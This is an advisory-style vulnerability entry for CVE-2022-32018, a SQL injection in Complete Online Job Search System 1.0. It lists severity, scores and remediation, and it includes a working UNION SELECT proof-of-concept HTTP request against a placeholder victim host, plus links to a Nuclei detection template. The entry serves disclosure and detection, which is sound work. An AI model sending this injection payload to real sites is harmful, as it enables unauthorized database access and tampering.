| Title | Complete Online Job Search System 1.0 - SQL Injection |
|---|---|
| Author | arafatansari |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. |
| CVSS Score | 7.2 |
| EPSS Score | 0.16601 |
| CVE ID | CVE-2022-32018 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli complete_online_job_search_system_project vuln |
Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
GET /index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5(8429),11,12,13,14,15,16,17,18,19--+ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/620.32 (KHTML, like Gecko) Version/17.1.10 Safari/620.32
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32018.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-32018.pcap
N/AN/A